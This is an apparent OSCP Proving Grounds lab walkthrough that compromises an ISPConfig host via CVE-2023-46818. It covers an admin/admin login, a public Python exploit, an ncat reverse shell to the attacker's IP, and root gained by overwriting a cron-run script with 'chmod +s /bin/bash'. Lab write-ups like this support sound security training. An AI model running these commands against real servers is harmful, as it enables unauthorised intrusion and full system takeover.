OSCP - Proving Grounds - CVE-2023-46818
Key takeaways
- Weak passwords
- Privilege escalation via a cron job
Steps
Start with nmap
Nmap scan report for 192.168.132.101
Host is up (0.44s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 51:56:a7:34:16:8e:3d:47:17:c8:96:d5:e6:94:46:46 (RSA)
| 256 fe:76:e3:4c:2b:f6:f5:21:a2:4d:9f:59:52:39:b9:16 (ECDSA)
|_ 256 2c:dd:62:7d:d6:1c:f4:fd:a1:e4:c8:aa:11:ae:d6:1f (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: E005890E1A93A4D04F2DB906C74066E1
| http-title: ISPConfig
|_Requested resource was /login/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
8080/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache
8081/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache
|_http-title: 403 Forbidden
Quite a few ports are open, so let's look at port 80 first. A quick search confirms that ISPConfig is a real tool.
Trying weak passwords first, admin/admin logs in successfully.
At the same time I looked up related vulnerabilities and first found the exploit below. It did not seem to work very well, but it gave a clue: this exploit is associated with CVE-2023-46818, the same as the machine's name.
ISPConfig 3.2.11 PHP Code Injection ≈ Packet Storm
Continuing the search for a CVE-2023-46818 exploit: GitHub - bipbopbup/CVE-2023-46818-python-exploit: CVE-2023-46818 IPSConfig Python exploit. This one works and gives a reverse shell, but it is quite limited, so we need a better reverse shell.
C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818\CVE-2023-46818-python-exploit-main> python exploit.py http://192.168.132.101 admin admin
[+] Target URL: http://192.168.132.101/
[+] Logging in with username 'admin' and password 'admin'
[+] Injecting shell
[+] Launching shell
ispconfig-shell#
So I first uploaded a precompiled ncat, made it executable, started nc -nlvp 80 locally, and ran the following command in the remote reverse shell; a new reverse shell was established.
/tmp/ncat -e /bin/bash 192.168.45.188 80
C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.132.101] 38486
whereis python
python: /usr/bin/python3.8 /usr/lib/python3.9 /usr/lib/python2.7 /usr/lib/python3.8 /etc/python3.8 /usr/local/lib/python3.8
Now we need a full TTY. After that, checking sudo -l and SUID binaries turned up nothing, and linpeas.sh showed no valuable leads either.
/usr/bin/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ips:/usr/local/ispconfig/interface/web/admin$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
<l/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
www-data@ips:/usr/local/ispconfig/interface/web/admin$ export TERM=xterm-256color
<fig/interface/web/admin$ export TERM=xterm-256color
www-data@ips:/usr/local/ispconfig/interface/web/admin$ ^Z
zsh: suspended nc -nlvp 80
C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818> stty raw -echo ; fg ;reset
[1] + continued nc -nlvp 80
0
www-data@ips:/usr/local/ispconfig/interface/web/admin$ stty columns 200 rows 200
But the pspy64 output showed this:
2024/11/12 15:47:01 CMD: UID=0 PID=37682 | /bin/bash /usr/local/ispconfig/server/server.sh
It looks like the reverse shell's user has write permission on that script.
www-data@ips:/tmp$ ls -l /usr/local/ispconfig/server/server.sh
-rwxr-x--- 1 www-data www-data 750 Sep 3 08:47 /usr/local/ispconfig/server/server.sh
Change server.sh to chmod +s /bin/bash; the next time it runs, /bin/bash gets the SUID bit.
www-data@ips:/usr/local/ispconfig/server$ echo "chmod +s /bin/bash" > server.sh
www-data@ips:/usr/local/ispconfig/server$ chmod +x server.sh
www-data@ips:/usr/local/ispconfig/server$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
www-data@ips:/usr/local/ispconfig/server$ /bin/bash -p
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data),1001(ispapps),1002(ispconfig)
bash-5.0# find / -type f -name proof.txt 2>/dev/null
/usr/local/ispconfig/interface/web/admin/proof.txt
bash-5.0# cat /usr/local/ispconfig/interface/web/admin/proof.txt
a468b9c91fcee9d14adf1ae2e51e45e5